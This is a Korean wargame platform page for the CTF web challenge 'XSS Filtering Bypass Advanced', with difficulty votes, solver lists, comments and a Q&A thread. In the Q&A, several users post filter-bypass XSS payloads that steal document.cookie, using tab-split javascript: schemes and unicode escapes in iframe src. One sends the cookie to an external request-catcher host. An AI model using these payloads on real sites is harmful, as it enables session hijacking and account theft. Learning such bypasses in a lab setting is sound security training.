학습
워게임
CTF
커뮤니티
랭킹
스토어
커리어
Beta
로그인
|
기업 서비스
Home
학습
워게임
CTF
커뮤니티
랭킹
커리어
Beta
기업 서비스로 이동하기 >
LEVEL 3
XSS Filtering Bypass Advanced
web
3730
1320
2022.03.31. 11:52:16
로그인 하고 문제 풀기
문제 정보
풀이
83
난이도 투표
149
질문
21
최근 풀이자
1320
댓글
33
문제 설명
Description
Exercise: XSS Filtering Bypass의 패치된 문제입니다.
문제 수정 내역
2023.08.04 Dockerfile 제공
Translate
난이도 투표
149
문제 풀이를 완료한 후에 피드백을 제출할 수 있습니다.
투표 결과
전체 투표 로그
1 / 30
0one
대표 업적 없음
LEVEL 2에 투표했습니다.
3일 전
MoFW
명탐정
LEVEL 3에 투표했습니다.
5일 전
눅눅한건빵칩
대표 업적 없음
LEVEL 3에 투표했습니다.
9일 전
바이따오웬
대표 업적 없음
LEVEL 4에 투표했습니다.
9일 전
Hanjy
고목
LEVEL 2에 투표했습니다.
10일 전
질문
21
문제 풀이에 어려움이 있으신가요?
커뮤니티에서 문제에 대한 질문하고 답변 얻기
iframe 관련해서 질문드립니다.
<iframe src="javas\tcript:locatio n.href='/memo?memo='+docu ment.cookie"> 다음과 같이 입력하여 플래그를 획득했습니다. 그런데 iframe이 새로운 html 창을 만드는건데 왜 src에 들어갔는데도 iframe의 쿠키가 아니라 부모 페이지의 쿠키가 찍힐 수 있는 건가요..?? <iframe src="javas cript:locatio n.href='/memo?memo='+parent.docu ment.cookie"> 위와 같이 입력하는게 맞다고 생각해서 아래와 같이 입력하고 실행해봤는데 똑같이 플래그가 출력이 됐습니다. javascript: 스키마가 iframe의 src에 바로 들어가는 경우 parent를 쓰지 않아도 된다고 생각하기에는 아래와 같이 강의 자료에서 parent.을 통해 접근하는게 보여서 parent는 쓰는 편이 좋은지 질문드립니다. image.png
reiki
답변
1
추천
0
1년 전
iframe과 img 태그의 차이 질문
<iframe src="javascri pt:locatio n.href='/memo?memo='+\u0064ocument.cookie"> <img src="javascri pt:locatio n.href='/memo?memo='+\u0064ocument.cookie"> 문제 해결은 탭 문자와 유니코드를 이용해 필터링 우회하여 해결하였습니다. 저는 여태까지 로드맵을 진행하면서 XSS 문제는 img 태그와 onerror 이벤트를 이용하여 해결했는데, 이번에는 img를 사용한 코드가 동작하지 않았습니다. 위의 두 코드가 실행되는 데 어떤 차이가 있나요?
isotope
답변
0
추천
0
2년 전
힌트 좀 부탁드립니다
on이나 script만 우회하면 될것 같은데 아무리 찾아봐도 잘 모르겠네용... 힌트 좀 주시면 감사하겠습니다
whitem4rk
답변
1
추천
0
3년 전
memo 페이지로 문제 풀이 방법 질문입니다
vuln 페이지 쿼리에 document.cookie를 보냈는데 memo에 PHPSESSID=random 이런식으로 세션 아이디가 그대로 찍히네요 드림핵 툴즈를 사용해서 푸는 방법 말고, memo에서도 풀어보고 싶습니다 제 방법이 잘못 된걸까요???
김주은
답변
1
추천
0
2년 전
풀다가 막혀서 질문드립니다
iframe 태그를 사용해서 javascript: 이런 형태로 필터링 단어는 정규화과정을 통해 우회하였습니다. 이후 memo=document.cookie의 값을 입력하여 전송했을때 제 테스트 쿠키로 vuln에서 테스트 할경우에는 쿠키값이 출력되는데 flag를 통해서 전송했을때는 왜 안보일까요..?
duo33
답변
1
추천
0
3년 전
필터링 우회 질문입니다!
/flag에서 <iframe src="javas%09cript:locatio%09n.href='/memo?memo='+do%09cument.cookie"> 이 안되는 이유가 get으로 URL에 넣는게 아니라 POST로 보내서 그런건가요? <iframe src="javas cript:locatio n.href='http://host3.dreamhack.games:17984/memo?memo='+do cument.cookie"> <- location 뒤에 memo 페이지의 전체 url을 붙이면 wrong??이 반환되는데 왜 그런거죠? img src=javascript: 는 부적절한 구문인가요? <img src o nerror="locatio n.href='/memo?memo='+do cument.cookie"> 는 왜 안되는걸까요
Ming9
답변
0
추천
0
2년 전
질문 있습니다
<embed src="data:text/html; base64 ... 를 이용해 문제를 해결하는 중인데 상위 페이지의 cookie값을 가져오지 못하고 있습니다. 제가 문제 방향을 이상하게 잡은건가요 ? 또 다른 방법이 있을까요..
유애나!
답변
1
추천
0
3년 전
우회 방법을 잘 모르겠습니다.
강의에서 본 <iframe src="\1\4jAVasC\triPT:alert(document.domain)">처럼 사용을 해보았으나 안됩니다.. script나 on 키워드를 우회하려면 어느 부분을 공부해 봐야 할까요? location이나 document는 javascript 스키마를 이용해서 했는데 중요한 script나 on 우회 방법을 모르겠습니다.
미어캣
답변
1
추천
0
3년 전
유니코드 우회에서 질문이 있습니다.
공격 페이로드를 `param=<iframe+src%3d"javascr ipt%3alocati\u006f\u006e.href%3d' /memo%3fmemo%3d'%2bd\u006fcument.co\u006fkie"/>` 이렇게 작성해서 플래그를 획득했는데, 근데 location을 우회할 때 2번째 글자 'o'를 우회하여 l\u006fcation 으로 우회하면 플래그 획득이 안 되고 locati\u006fn 혹은 locati\u006f\u006e 이렇게 해야지만 플래그가 획득되는데 이유가 뭘까요?
123sdaf32
답변
1
추천
0
1년 전
왜 URL not found가 계속 뜨는지 알려 주세요..
<iframe src=“javascri pt:locatio n.href=‘https://XXXXX.request.dreamhack.games/?memo=’+d ocument.cookie”> <iframe src=“javascri` pt:locatio n.href=‘/memo?memo=’+d ocument.cookie”> 이런식으로 bypass를 했는데 filtered!!!가 안뜨긴 하는데 계속 ` Not Found The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. ` 가 계속 나옵니다... 왜 이러는지 알려 주실 수 있나요..?
김주은
답변
0
추천
0
2년 전
«
‹
1
2
3
›
»
LEVEL 3
XSS Filtering Bypass Advanced
web
3730
1320
2022.03.31. 11:52:16
로그인 하고 문제 풀기
출제자 정보
Dreamhack
대표 업적 없음
Dreamhack official account
First Blood!
as3617
워게임 고인물
출제된 지
2시간
만에 풀이 완료!
최근 풀이자
1320
0one
대표 업적 없음
4일 전
MoFW
명탐정
5일 전
STE4LTH
대표 업적 없음
5일 전
명종
대표 업적 없음
8일 전
leafistheBEST
대표 업적 없음
9일 전
눅눅한건빵칩
대표 업적 없음
9일 전
바이따오웬
대표 업적 없음
9일 전
Donte
초고속
9일 전
Hanjy
고목
10일 전
servelt
대표 업적 없음
11일 전
«
‹
1
2
3
4
5
›
»
댓글
33
피곤해요
대표 업적 없음
27일 전
I hate XSS....
Translate
어제의 나보다 나아진 오늘을 희망하며
웹해킹 고인물
5개월 전
어제의 나보단 오늘의 나가 더 낫겠지 희망하며
Translate
BTB
워게임: 1
10개월 전
어렵습니다
Translate
๑✪_✪๑
대표 업적 없음
11개월 전
진짜 너무 어렵다.. 내가 잘 해낼 수 있을까..
Translate
n0thing
대표 업적 없음
1년 전
어지러워
Translate
O_F
대표 업적 없음
2년 전
좋습니다.
Translate
buaii
워게임 고인물
2년 전
XSS Filtering Bypass문제를 잘 생각해보면 풀립니다
Translate
l000wk3y
공부벌레
2년 전
어려운 방법으로 풀면 어렵습니다. ㅠㅠ 쉬운 방향으로 푸는 방법을 찾아보시는게 좋아요.
Translate
엑슨
워게임 고인물
2년 전
힘들었다..
Translate
겨미
강의 수강: 1
3년 전
바보같이 입력폼에 그대로 붙여넣기하느라 삽질하고있었네요...
Translate
«
‹
1
2
3
4
›
»
댓글 33